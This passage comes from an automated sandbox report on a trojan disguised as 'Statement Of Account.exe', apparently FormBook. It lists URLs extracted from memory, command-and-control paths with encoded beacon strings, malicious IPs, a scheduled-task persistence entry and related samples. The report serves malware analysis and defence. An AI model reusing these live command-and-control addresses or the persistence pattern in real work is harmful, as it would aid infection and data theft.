                                          https://wns.windows.com/Lexplorer.exe, 00000009.00000002.2951588982.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.kustomequipment.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://word.office.comexplorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.otirugkyt.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.lolabeautystudios.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://schemas.micrexplorer.exe, 00000009.00000002.2947771554.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.lolabeautystudios.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.udin88b.usReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.baansbliss.com/gs12/www.otirugkyt.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.kustomequipment.com/gs12/www.novistashop.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.carterandcone.comlStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.udin88b.us/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers/frere-user.htmlStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.hjgd.xyz/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.airzf.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.demandstudiosnews.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000009.00000000.1714988461.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://outlook.com_explorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		low
                                                                  http://www.heavydutywearpart.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.novistashop.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.bodution.website/gs12/www.juniavilela.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.demandstudiosnews.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.demandstudiosnews.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.bodution.websiteReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://www.fontbureau.com/designersGStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://schemas.miexplorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://www.nexelab.com/gs12/www.udin88b.usexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.fontbureau.com/designers/?Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.founder.com.cn/cn/bTheStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.lolabeautystudios.com/gs12/www.kustomequipment.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.fontbureau.com/designers?Statement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.heavydutywearpart.com/gs12/www.goldenvistaservices.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://powerpoint.office.comcemberexplorer.exe, 00000009.00000002.2951588982.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1725997726.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.tiro.comStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.bodution.website/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.goodfont.co.krStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.juniavilela.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.novistashop.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.udin88b.us/gs12/www.baansbliss.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://schemas.microexplorer.exe, 00000009.00000002.2945097297.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.2948147154.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1719884903.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.zdryueva.com/gs12/www.hjgd.xyzexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.goldenvistaservices.comReferer:explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.goldenvistaservices.com/gs12/explorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://www.typography.netDStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                http://www.galapagosdesign.com/staff/dennis.htmStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                		unknown
                                                                                https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.nexelab.comexplorer.exe, 00000009.00000002.2953733538.000000000CB74000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://api.msn.com/qexplorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000009.00000002.2942465733.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://www.fonts.comStatement Of Account.exe, 00000000.00000002.1713238980.0000000007182000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          91.195.240.94
                                                                                          		www.b-a-s-e.netGermany
                                                                                          		47846SEDO-ASDEtrue
                                                                                          154.12.38.29
                                                                                          		www.airzf.comUnited States
                                                                                          		54133UNMETEREDCAtrue
                                                                                          34.149.87.45
                                                                                          		td-ccm-neg-87-45.wixdns.netUnited States
                                                                                          		2686ATGS-MMD-ASUStrue

                                                                                          General Information

                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                          Analysis ID:1430501
                                                                                          Start date and time:2024-04-23 18:42:07 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 10m 18s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:22
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:1
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:Statement Of Account.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.evad.winEXE@227/15@4/3
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 122
                                                                                          • Number of non-executed functions: 329
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe

                                                                                          Warnings

                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • VT rate limit hit for: Statement Of Account.exe

                                                                                          Simulations

                                                                                          Behavior and APIs

                                                                                          TimeTypeDescription
                                                                                          17:43:03Task SchedulerRun new task: SdYCcXyq path: C:\Users\user\AppData\Roaming\SdYCcXyq.exe
                                                                                          18:42:59API Interceptor1x Sleep call for process: Statement Of Account.exe modified
                                                                                          18:43:01API Interceptor31x Sleep call for process: powershell.exe modified
                                                                                          18:43:03API Interceptor1x Sleep call for process: SdYCcXyq.exe modified
                                                                                          18:43:05API Interceptor1605484x Sleep call for process: explorer.exe modified
                                                                                          18:43:51API Interceptor1892540x Sleep call for process: cmstp.exe modified

                                                                                          Joe Sandbox View / Context

                                                                                          IPs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          91.195.240.94SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          DOC 331-100920-00.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.rssnewscast.com/fo8o/
                                                                                          fedex awb &Invoice.vbsGet hashmaliciousFormBookBrowse
                                                                                          • www.winhgx.com/r6ib/
                                                                                          order enquiry PDF.vbsGet hashmaliciousFormBookBrowse
                                                                                          • www.5597043.com/uf1r/?UDwd=fRlBiYKTb4kHHTeAB+JUEo8QwhpBajaUBAMzSQktRYr91tJh38DuECURDEfreCzcEFd3cb/SjxROJA5JZTrgYxjmLw41heutXinNmJLTVm0wgqrelA==&sRy=BLaLYB
                                                                                          inpau292101.jsGet hashmaliciousFormBookBrowse
                                                                                          • www.itsolutionsguide.com/h4wu/
                                                                                          bin.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.5597043.com/nrup/
                                                                                          ccWXalS8xg.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.5597043.com/nrup/?Gv=2at1c1MHk4LdsVUDX7pNDf+fAhTXeAfnTyG93G2uP4ilKgyCyFz2asT5AaTCMTK+FwXayJ+KsNmilZED2txkhAZ8TPVN5OugBakdvvUOZZN5OdK6QUrIUUU=&jH1=cn4P66
                                                                                          1No1dv4uLe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.5597043.com/nrup/
                                                                                          Sf5Aw7E8Cu.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • www.5597043.com/nrup/
                                                                                          154.12.38.29Pago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.airzf.com/gs12/?4h0=DR9+51q0CIrIDgcjStoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpz0r/rXmCdIn&vT=LtxxLba
                                                                                          34.149.87.45BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cawthonisland.com/n8t5/
                                                                                          W9PJhOS2if.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                          • www.btoolrental.com/h2uv/
                                                                                          KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.gotoacts.com/gh9e/
                                                                                          Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.kirtirefrigeration.com/vr01/?DVo0=YlUPPT_xC8f&tXR=0FWlSxGTmUQimNBR32eEzlQTpbLPYM717ItFtF8k1xbK31xxaWzDAorSZWydXdGbldeP
                                                                                          gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.marketfield.shop/fs83/?F0G=4hOdKx&AZ=PxL3VQB4Sdgq6jr23wfaug9eE7OdOXWULdhKB6JBDCrnppycfZMTbfzbbQYOONDvmdl8
                                                                                          UAyH98ukuA.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.marketfield.shop/fs83/?K6kd=PxL3VQB4Sdgq6jr23wfaug9eE7OdOXWULdhKB6JBDCrnppycfZMTbfzbbQUOddPs/NlqoPz4+A==&uTrL=_bj8lfEpU
                                                                                          5AmzSYESuY.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.nywaiverlatam.com/kh11/?sp=Jmknm8r0fsZ3k4pSN4CZEKqCudIMVd2vl9v2BJ6TuU2yuR603/4VvUHu+6VUHV8AI6Ge&SP=cnxh5xAH
                                                                                          0wD4IaXvQH.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.northcuttmediacompany.com/kh11/?ExlpdH=Hb7mW8UWGjoRY5bqEojHo/Kku7FzWoNjOhlt8bO4JRod1UJOiQTUNOQEh0RNC8VxQKzQ&anx=TXFXCVdxMl5ty
                                                                                          dVebcwR6p0.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.marketfield.shop/fs83/?NVoluR=PxL3VQB4Sdgq6jr23wfaug9eE7OdOXWULdhKB6JBDCrnppycfZMTbfzbbQUOddPs/NlqoPz4+A==&Txl=O0GPaRWPLnPXX6
                                                                                          Scan Document Copy_docx.exeGet hashmaliciousFormBookBrowse
                                                                                          • www.cawthonisland.com/n8t5/

                                                                                          Domains

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          www.airzf.comPago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.12.38.29
                                                                                          td-ccm-neg-87-45.wixdns.nethttp://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
                                                                                          • 34.149.87.45
                                                                                          http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
                                                                                          • 34.149.87.45
                                                                                          Ola#U011fan#U00fcst#U00fc #U00f6deme.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          BL4567GH67_xls.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          https://hopp.bio/documentGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                          • 34.149.87.45
                                                                                          https://hopp.bio/pdf-documentGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                          • 34.149.87.45
                                                                                          W9PJhOS2if.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          KCS20240042- cutoms clearance doc.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          Purchase Order#44231.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45
                                                                                          gRDcPJpgMQ.exeGet hashmaliciousFormBookBrowse
                                                                                          • 34.149.87.45

                                                                                          ASNs

                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          UNMETEREDCAPago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                          • 154.12.38.29
                                                                                          v6SEx6rJ3E.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, Stealc, VidarBrowse
                                                                                          • 38.147.122.254
                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                          • 38.147.122.253
                                                                                          SecuriteInfo.com.FileRepMalware.4269.6620.exeGet hashmaliciousUnknownBrowse
                                                                                          • 154.12.35.37
                                                                                          ckS92jgGGm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.147.250.143
                                                                                          VFSJUqK11j.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.147.22.98
                                                                                          uCEcm0sVMK.elfGet hashmaliciousMiraiBrowse
                                                                                          • 38.147.202.241
                                                                                          Fr2X6xwNNK.elfGet hashmaliciousUnknownBrowse
                                                                                          • 38.147.26.128
                                                                                          S2So6J38N6.elfGet hashmaliciousMiraiBrowse
                                                                                          • 154.12.57.120
                                                                                          Q017PzM46q.elfGet hashmaliciousMiraiBrowse
                                                                                          • 154.12.57.120
                                                                                          ATGS-MMD-ASUShttp://geoguesser.com/seterra/en-an/vpg/3811?C=K44CTGet hashmaliciousUnknownBrowse
                                                                                          • 34.49.229.81
                                                                                          http://geoguesser.com/seterra/en-an/vpg/3800Get hashmaliciousUnknownBrowse
                                                                                          • 34.149.87.45
                                                                                          https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3ZGet hashmaliciousUnknownBrowse
                                                                                          • 34.149.124.125
                                                                                          oVOImRIAaz.elfGet hashmaliciousMiraiBrowse
                                                                                          • 34.165.16.62
                                                                                          NMdpQecbkg.elfGet hashmaliciousMiraiBrowse
                                                                                          • 32.61.182.142
                                                                                          1mHUcsxKG6.elfGet hashmaliciousMiraiBrowse
                                                                                          • 32.173.179.64
                                                                                          xzk9TKqNoI.elfGet hashmaliciousMiraiBrowse
                                                                                          • 32.90.151.127
                                                                                          sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                          • 57.253.16.154
                                                                                          sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                          • 34.169.234.162
                                                                                          nagateliteqfUK.exeGet hashmaliciousAZORult++Browse
                                                                                          • 34.160.144.191
                                                                                          SEDO-ASDEPO0423024.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.19
                                                                                          PO0423023.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.19
                                                                                          PO 26519PZ F30 59.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.117
                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.19
                                                                                          PO_PDF24172024.scr.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.117
                                                                                          Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.19
                                                                                          eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.117
                                                                                          SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.12126.13851.exeGet hashmaliciousFormBookBrowse
                                                                                          • 91.195.240.94
                                                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.19
                                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                          • 91.195.240.19

                                                                                          JA3 Fingerprints

                                                                                          No context

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SdYCcXyq.exe.log

                                                                                          Download File
                                                                                          Process:C:\Users\user\AppData\Roaming\SdYCcXyq.exe
